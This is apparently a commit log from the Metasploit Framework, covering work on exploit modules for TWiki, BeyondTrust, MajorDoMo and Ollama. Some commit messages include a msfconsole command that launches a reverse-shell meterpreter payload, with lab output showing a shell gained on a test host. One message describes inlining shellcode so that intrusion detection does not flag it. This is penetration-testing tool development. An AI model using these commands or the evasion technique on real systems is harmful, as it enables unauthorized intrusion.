Commit Graph

20636 Commits

Author SHA1 Message Date
adfoster-r7 9df6879a95 Update modules to use srvhost method 2026-03-03 09:37:25 -05:00
Spencer McIntyre 758ac7f2f6 Apply rubocop changes 2026-03-03 09:34:49 -05:00
Spencer McIntyre fc49421939 Replace checks for nonroutable addresses
This consolidates modules that check for a nonroutable SRVHOST value and
replaces it with OptAddressRoutable, defaulting to a reasonable address.
2026-03-03 09:34:49 -05:00
Spencer McIntyre a0fb02bd45 Default the address in the SMB share mixin 2026-03-03 09:34:49 -05:00
Spencer McIntyre 92e77de800 Update to use OptAddressRoutable for SRVHOST 2026-03-03 09:34:48 -05:00
Brendan 9ea5a54fe9 Merge pull request #20940 from g0tmi1k/twiki_search
twiki_search: Fix exploit, more verbose, error handling, add fetch payload support
2026-03-02 17:55:50 -06:00
Brendan 9664ab5191 Merge pull request #20946 from g0tmi1k/twiki_history
twiki_history: Add revision+page options & Fetch payload support
2026-03-02 13:58:44 -06:00
adfoster-r7 7545328be1 Linting 2026-03-02 15:02:56 +00:00
adfoster-r7 1a4ae7bfa3 Fix broken module url references 2026-03-02 14:35:48 +00:00
Diego Ledda 6f84c83135 Merge pull request #21000 from Chocapikk/add-modules-majordomo-rce
Add three MajorDoMo unauthenticated RCE modules
2026-03-02 05:20:22 -05:00
Valentin Lobstein 615ca34e29 Fix: Remove explicit timeouts from send_request_cgi calls 2026-02-27 14:42:00 +01:00
Valentin Lobstein 6923badeac Fix: Use background thread for cycle.php bootstrap instead of timeout 2026-02-27 14:34:24 +01:00
Valentin Lobstein 76d103e483 Fix: Bootstrap cycle tables and update lab documentation
Add cycle.php bootstrap request in cmd_injection module to create
missing MEMORY tables before starting the cycle_execs.php worker.
Update all three module docs with curl in Dockerfile, Docker gateway
instructions, Options sections, and verified scenario outputs.
2026-02-27 14:33:04 +01:00
g0t mi1k 218c8df3bd twiki_search: Drop MeterpreterTryToFork & fail_with 2026-02-26 09:35:50 +00:00
g0t mi1k fd1d10ec28 twiki_history: Drop MeterpreterTryToFork & fail_with 2026-02-26 09:27:53 +00:00
g0t mi1k 801bc77ec8 twiki_search: Add Linux fetch payload support
Fetch over CmdStager

- - -

Without MeterpreterTryToFork:
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49864) at 2026-02-19 17:22:57 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_search) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 4935 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
2026-02-26 07:12:47 +00:00
g0t mi1k 529b53ecc4 twiki_search: Add send_request() function
This is based on MR feedback
2026-02-26 07:12:47 +00:00
g0t mi1k 188832d68f twiki_search: Var consistencies
Sorry, not sorry
2026-02-26 07:12:47 +00:00
g0t mi1k 1d40b352a5 twiki_search: Consistency with exploit & check
Payload & formatting was slightly different
2026-02-26 07:12:47 +00:00
g0t mi1k 0395a27358 twiki_search: Improve error handling 2026-02-26 07:12:47 +00:00
g0t mi1k 71845d44a1 twiki_search: Be more verbose 2026-02-26 07:12:47 +00:00
g0t mi1k 627c1272da twiki_search: Add versions to description
REF: https://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
2026-02-26 07:12:47 +00:00
g0t mi1k c7ffa09f01 twiki_search: Add SEARCH_PATH & switch default
/search/Main/SearchResult - https://www.exploit-db.com/exploits/642   *Works for me*

/view/Main/WebSearch      - https://github.com/rapid7/metasploit-framework/commit/6414821ea860c6f33d9129d9af0e9648be5972a9   *Fails for me*
2026-02-26 07:12:47 +00:00
g0t mi1k 6c804749f2 twiki_search: Switch from > to |tee
Otherwise:
> sh: gt: command not found
2026-02-26 07:12:47 +00:00
g0t mi1k 0b1687b5d5 twiki_history: Add Linux fetch payload support
Fetch over CmdStager

- - -

Without MeterpreterTryToFork:
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_history; set payload cmd/linux/http/x86/meterpreter/reverse_tcp; run'
[...]
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:40453) at 2026-02-19 19:30:07 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_history) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5042 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
2026-02-26 07:12:43 +00:00
g0t mi1k a22698205e twiki_history: Add send_request() function
This is based on MR feedback
2026-02-26 07:12:43 +00:00
g0t mi1k b393381296 twiki_history: Var consistencies
Sorry, not sorry
2026-02-26 07:12:42 +00:00
g0t mi1k 3adcfb8825 twiki_history: Improve error handling 2026-02-26 07:12:42 +00:00
g0t mi1k 4530fb3d13 twiki_history: Be more verbose 2026-02-26 07:12:42 +00:00
g0t mi1k 97668a0f0f twiki_history: Add TWIKI_PAGE
It can be any twiki page
2026-02-26 07:12:42 +00:00
g0t mi1k cffe0804ab twiki_history: Consistency with exploit & check 2026-02-26 07:12:42 +00:00
g0t mi1k 6177ba25fa twiki_history: Add versions to description
REF: https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
2026-02-26 07:12:42 +00:00
g0t mi1k bad9f29265 twiki_history: Add TWIKI_REVISION
Cannot leave it to chance, otherwise you may get HTTP 404
2026-02-26 07:12:42 +00:00
msutovsky-r7 ccce3a7dca Land #20951, moves default payload into more consistent default options
Moves default payload into default options in Remote for Mac module
2026-02-25 17:06:30 +01:00
msutovsky-r7 fae76b2961 Land #20978, adds module BeyondTrust unauth command injection (CVE-2026-1731)
Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/R…
2026-02-25 14:18:59 +01:00
Martin Sutovsky 0c12becfcf Separates modules 2026-02-25 13:56:13 +01:00
Martin Sutovsky 63c7bd4958 Temp rollback 2026-02-25 13:54:20 +01:00
msutovsky-r7 7dcc036b6d Land #21006, adds module for Ollama path traversal RCE (CVE-2024-37032)
Add Ollama path traversal RCE module (CVE-2024-37032)
2026-02-25 13:06:09 +01:00
msutovsky-r7 c5303e2ac1 Apply suggestion from @msutovsky-r7 2026-02-25 12:54:17 +01:00
msutovsky-r7 002daf8d7d Merge branch 'beyondtrust-rce-2026' into collab/exploit/beyondtrust/cve-2026-1731 2026-02-25 12:53:37 +01:00
Jonah Burgess e77b1c00c6 Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/RS RCE 2026-02-25 10:12:23 +01:00
Valentin Lobstein fd92207119 Fix BeyondTrust exploit failing on older instances (22.x)
The /get_mech_list?version=3 endpoint returns HTTP 500 on older
BeyondTrust versions that do not support the JSON API. Add a
fallback to version=2 which returns semicolon-separated key=value
pairs (e.g. "company=sewtest;product=ingredi").

Also remove the "Thank you for using BeyondTrust" check in the
BRDF validation, as PRA instances do not contain this string,
causing the check method to incorrectly report Unknown for PRA
targets.
2026-02-25 10:12:21 +01:00
Jonah Burgess 4f2eafda09 Changed error wording to remove patch specifics and loosen wording to 'may indicate' as there could be other reasons for the websocket exiting unexpectedly, e.g. using the cmd/unix/generic payload results in the error, even when target is vulnerable and the exploit succeeds 2026-02-25 10:11:18 +01:00
Jonah Burgess 0b78ab319e improved version checking (I think) 2026-02-25 10:11:18 +01:00
Jonah Burgess b43b204060 Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/RS RCE 2026-02-25 10:11:15 +01:00
Valentin Lobstein 70dd190bc7 Fix: Inline shellcode via asm db instead of mmap RWX
Use Metasm's asm("db ...") to embed shellcode directly in .text section
which is executable by default. Removes mmap/memcpy/mprotect entirely,
avoiding RWX or W^X allocations that IDS may flag.

Parent process uses _exit(0) instead of return since the inlined
shellcode bytes follow the setsid() call in the instruction stream.

Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
2026-02-24 23:32:05 +01:00
Valentin Lobstein d6d9180b7c Fix: Clarify why fork+setsid is in the constructor
PrependFork operates at shellcode level, but fork must happen in the
.so constructor so the runner process returns immediately and is not
blocked by the payload execution.

Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
2026-02-24 23:29:25 +01:00
Valentin Lobstein 4031d7d950 Fix: Randomize chat trigger message content
Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
2026-02-24 23:29:13 +01:00
Valentin Lobstein 29a02274cf Refactor: Remove redundant Platform/Arch from single target 2026-02-24 17:54:28 +01:00
Valentin Lobstein 5aeff61b26 Fix: Address PR review feedback for Ollama RCE module
Co-Authored-By: msutovsky-r7 <190406428+msutovsky-r7@users.noreply.github.com>
2026-02-24 17:51:23 +01:00